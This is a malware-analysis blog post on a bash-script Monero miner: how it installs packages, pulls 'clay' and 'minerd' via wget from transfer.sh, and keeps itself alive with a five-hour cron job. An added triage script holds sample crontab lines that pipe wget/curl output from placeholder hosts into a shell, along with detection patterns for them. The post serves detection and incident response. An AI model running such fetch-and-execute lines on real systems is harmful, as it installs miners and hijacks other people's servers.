New Coin Miner Malware Bashes The Unsuspecting

Overview

LMNTRIX Labs has reported on multiple coin-miner infections. In the latest one, we found a bash script that installs itself as a cron job and then downloads the executables for a Monero (XMR) miner.

Here’s the analysis.

Bash Script Coin Miner Malware

LMNTRIX Labs researchers discovered a bash script that downloads the coin-mining malware.

MD5: eef5cdda9cc6415e94ecdfe1214e732a

Size: 3.65 KB

File Type: Bash Script

 

Figure 1 VT detection for the coin mining bash script

 

Figure 2 Malicious link hosting two coin miner files

The picture above shows the relationship between the malicious site (transfer.sh) that hosts the two coin miner files and the bash script that downloads them. The script uses the wget command to pull the files onto the victim server.

 

Figure 3 Downloading the coin miner files

The VirusTotal links below are for the two files: 'clay' is a known Trojan, and 'minerd' is, as the name suggests, a crypto miner.

https://www.virustotal.com/#/file/260ef4f1bb0e26915a898745be873373f083227a4f996731f9a3885397a49e79/detection

 

Figure 4 CLAY

https://www.virustotal.com/#/file/2d89b48ed09e68b1a228e08fd66508d349303f7dc5a0c26aa5144f69c65ce2f2/detection

 

Figure 5 MINERD

To avoid dependency errors, the bash script installs all the required packages first and only then downloads the coin miner files.

 

Figure 6 Installing all the required programs to avoid dependency issues



Determining the Core Count – It Doesn't Need Every Core for Mining

The bash script checks how many CPU cores the server has. If the count is greater than four, the miner is configured to use only half of them, so that it does not consume the server's full capacity.

 

Figure 7 Code that determines the core count and sets the miner's resource consumption

Persistency

The script creates a cron job that re-downloads the original bash script every five hours. The vital step for incident response is that, along with the malware, the cron job must also be removed. Otherwise, even after all the mining programs have been removed from the infected server, this tiny cron job will persist and reinstall them.
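As an added example (this is not the post's own code and not the malware's), the following shell helper implements the incident-response check described in this section together with the file indicators from the section above: it flags crontab entries that fetch a remote script and pipe it into a shell, flags processes named minerd or clay or pointing at a stratum mining-pool URL, and compares files against the two SHA-256 values from the VirusTotal links above. The sample crontab and process listing embedded in it are constructed, with placeholder hostnames and paths (they are not indicators from the analysis); run it with --scan to check the live host instead.

```shell
#!/usr/bin/env bash
# Added triage helper (not code from the LMNTRIX post or from the malware).
# Looks for the two artefacts the analysis describes: a cron entry that
# re-downloads a remote script and pipes it into a shell, and the 'minerd'
# and 'clay' binaries, by name, by mining-pool URL, and by SHA-256.

# SHA-256 values from the post's VirusTotal links ('clay' and 'minerd').
KNOWN_SHA256='260ef4f1bb0e26915a898745be873373f083227a4f996731f9a3885397a49e79
2d89b48ed09e68b1a228e08fd66508d349303f7dc5a0c26aa5144f69c65ce2f2'

# Constructed sample crontab; hostnames and paths are placeholders, not IOCs.
SAMPLE_CRON='# m h dom mon dow command
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
0 */5 * * * wget -q -O - http://dropper.example.invalid/x.sh | bash
*/10 * * * * curl -fsSL http://dropper.example.invalid/a.sh | sh >/dev/null 2>&1
0 3 * * * /usr/bin/certbot renew --quiet
0 2 * * * /usr/local/bin/backup.sh | logger -t backup
@reboot /tmp/.x/minerd -o stratum+tcp://pool.example.invalid:3333'

# Constructed sample of `ps -eo pid,user,pcpu,args` output.
SAMPLE_PS='  PID USER     %CPU COMMAND
 1234 www-data 98.2 /tmp/.x/minerd -a cryptonight -o stratum+tcp://pool.example.invalid:3333 -u WALLET -p x
 1300 root      0.0 /usr/sbin/sshd -D
 1400 www-data 45.0 ./clay'

# Reads crontab text on stdin and prints entries that either (a) fetch with
# wget/curl and pipe the result into a shell (the re-download pattern from the
# post) or (b) run something out of a world-writable directory.
# Comments and blank lines are skipped. A pipe alone (e.g. into logger) is not flagged.
flag_suspicious_cron() {
  grep -Ev '^[[:space:]]*(#|$)' |
    grep -E '(wget|curl)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)|(^|[[:space:]])/(tmp|var/tmp|dev/shm)/'
}

# Reads ps output on stdin and prints processes whose command is minerd or clay,
# or whose command line names a stratum mining-pool URL.
flag_miner_processes() {
  grep -Ei '(^|[[:space:]/])(minerd|clay)([[:space:]]|$)|stratum[+]tcp://'
}

# Returns 0 and prints the path if any given file has one of the published
# hashes; returns 1 otherwise. Missing files are skipped.
check_known_hashes() {
  found=1
  for f in "$@"; do
    [ -f "$f" ] || continue
    h=$(sha256sum "$f" 2>/dev/null | cut -d' ' -f1)
    [ -n "$h" ] || continue
    if printf '%s\n' "$KNOWN_SHA256" | grep -qx "$h"; then
      printf 'KNOWN MALICIOUS HASH: %s %s\n' "$h" "$f"
      found=0
    fi
  done
  return $found
}

# Live mode: system and per-user crontabs, the process list, and any files
# named on the command line, e.g.  ./triage.sh --scan /tmp/.x/minerd
scan_host() {
  echo '== suspicious cron entries =='
  { cat /etc/crontab /etc/cron.d/* 2>/dev/null
    cut -d: -f1 /etc/passwd | while read -r u; do crontab -l -u "$u" 2>/dev/null; done
  } | flag_suspicious_cron
  echo '== suspicious processes =='
  ps -eo pid,user,pcpu,args | flag_miner_processes
  echo '== known hashes =='
  check_known_hashes "$@" || echo 'no file matched a published hash'
}

if [ "${1:-}" = "--scan" ]; then
  shift
  scan_host "$@"
else
  echo '== sample crontab: flagged entries =='
  printf '%s\n' "$SAMPLE_CRON" | flag_suspicious_cron
  echo '== sample process list: flagged processes =='
  printf '%s\n' "$SAMPLE_PS" | flag_miner_processes
fi
```

Removing the flagged cron line and killing the flagged processes is the minimum; because the cron entry re-fetches the dropper, re-run the scan after five hours (or check the cron spool again) to confirm nothing was reinstated.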

Additional Context: Browser-Based Coin Miner

Most coin-mining malware seems to focus on Linux-based servers. One reason may be that many Linux servers are not protected by a good AV solution. That said, we have seen infections on Windows machines as well.

Apart from this mining malware, there is also coin-mining malware that can execute in any environment: Coinhive, a JavaScript miner placed on a compromised website. In our earlier research, our team analysed the Coinhive JavaScript, which uses the client's web browser to perform the mining. In that case, the resources consumed by the running process appeared to belong to the web browser.

 

It is worth noting that popular sites like The Pirate Bay, Vimshop.win, and Showtime have moved away from monetizing with ads in favour of using Coinhive to generate revenue.



Precautionary Steps To Take

LMNTRIX Labs recommends blocking known mining-pool sites at the proxy and firewall. Anti-malware solutions should be in place on Linux servers too, and security patches kept up to date. Additionally, monitoring server health checks provides valuable information on resource utilization, which helps administrators detect the presence of a miner and find the root cause of the infection.

 


On 2018-05-01
